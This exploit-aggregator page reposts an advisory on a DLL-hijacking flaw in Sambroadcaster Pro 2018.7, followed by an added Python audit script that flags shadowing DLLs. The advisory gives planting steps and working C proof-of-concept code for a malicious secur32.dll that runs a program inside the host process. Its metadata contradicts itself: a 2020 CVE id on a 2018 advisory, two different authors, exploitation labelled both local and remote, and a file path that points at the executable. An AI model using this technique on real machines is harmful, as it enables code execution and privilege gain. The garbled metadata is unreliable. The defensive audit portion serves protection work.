Sambroadcaster Pro 2018.7 - Insecure Library Loading Code Execution

CVE: CVE-2020-14342
Category: CWE-426
Price: $10,000
Severity: High
Author: Rafay Baloch
Risk: High
Exploitation Type: Local
Date: 2018-08-12
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
EPSS: 0.125
EPSSP: 0.90625


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018080085

Below is a copy:

Document Title:
===============
Sambroadcaster Pro 2018.7 - Insecure Library Loading Code Execution


Product & Service Introduction:
===============================
SAM Broadcaster is an Internet radio broadcasting application from Spacial. The name "SAM" is an acronym for Streaming Audio Manager, which describes the features of the software. 
The software includes features for running an Internet radio station from a single computer.

(Copy of the Vendor Homepage: https://spacial.com/)


Exploitation Technique:
=======================
Remote


Platform Tested:
================
Windows 10


Technical Details & Description:
================================
A local Insecure Library Loading vulnerability has been discovered in the official Sambroadcaster Pro 2018.7 software.

The issue allows local attackers to inject code through vulnerable dynamic link libraries to compromise the process
or to gain higher system access privileges. A local attacker can thus compromise the system process of the
affected software and follow up with further manipulation.


Vulnerable Software:
[+] Sambroadcaster Pro


Vulnerable version(s):
[+] 2018.7


Affected Libraries:
[+] secur32.dll


Proof of Concept (PoC):
=======================
The DLL hijack vulnerability can be exploited by local attackers with a restricted system user account and without user interaction.
The attacker will be able to take control of a computer and execute in the background a trojan horse or ransomware, for example.
For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.


Manual steps to reproduce the local vulnerability ...

1. Compile dll
2. Rename the dynamic link library to secur32.dll
3. Copy secur32.dll to C:\Program Files\SpacialAudio\SAMBC\SAMBC.exe
4. Launch SAMBC.exe
5. Now the calculator executes!


-- PoC Exploit --
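#include <windows.h>
#include <stdlib.h>
#define DLLIMPORT __declspec (dllexport)

/* Demonstration payload: starts the calculator, then ends the host process. */
int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

/* Exported function that runs the payload when it is called. */
DLLIMPORT void HrCreateConverter() { evil(); }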
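
Added example (not part of the original advisory): a defender-side audit for the condition the steps above rely on, a DLL in the application's install directory that carries the name of a System32 library such as secur32.dll, which Windows finds in the application directory before it looks in System32. The function names and the demo directory layout are assumptions, and the sample files are constructed placeholders rather than real libraries.

```python
import hashlib
import os
import sys
import tempfile
from pathlib import Path


def _sha256(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def find_shadowing_dlls(app_dir, system_dir):
    """Return [(dll_name, differs_from_system_copy)] for every DLL in app_dir
    whose file name (case-insensitive, as on Windows) also exists in system_dir."""
    system = {p.name.lower(): p for p in Path(system_dir).iterdir()
              if p.is_file() and p.suffix.lower() == ".dll"}
    findings = []
    for p in sorted(Path(app_dir).iterdir()):
        twin = system.get(p.name.lower())
        if p.is_file() and twin is not None:
            findings.append((p.name, _sha256(p) != _sha256(twin)))
    return findings


def demo():
    """Constructed sample: throwaway directories standing in for the install
    directory and System32 (file contents are placeholders, not real DLLs)."""
    with tempfile.TemporaryDirectory() as root:
        app, system = Path(root, "SAMBC"), Path(root, "System32")
        app.mkdir()
        system.mkdir()
        (system / "secur32.dll").write_bytes(b"system copy")
        (system / "version.dll").write_bytes(b"same bytes")
        (app / "Secur32.DLL").write_bytes(b"planted copy")   # name collision, different content
        (app / "version.dll").write_bytes(b"same bytes")     # name collision, identical content
        (app / "vendor_codec.dll").write_bytes(b"app-only")  # no System32 twin, not reported
        return find_shadowing_dlls(app, system)


if __name__ == "__main__":
    if len(sys.argv) > 1:  # on Windows: pass the install directory to audit
        sysdir = Path(os.environ.get("SystemRoot", r"C:\Windows"), "System32")
        for name, differs in find_shadowing_dlls(sys.argv[1], sysdir):
            state = "DIFFERS from" if differs else "is identical to"
            print(f"{name}: shadows a System32 library and {state} the system copy")
    else:
        print(demo())
```

A name collision whose content differs from the system copy is the finding to triage first, for example by checking the file's signature and who can write to the install directory.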


Credits & Authors:
==================
Social:    twitter.com/@ZwX2a
Contact :   [email protected]


[#] Disclaimer: 
=============== 
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due 
credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the 
author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.



    Copyright  2018 | ZwX - Security Researcher (Software & web application)

Copyright ©2024 Exploitalert.
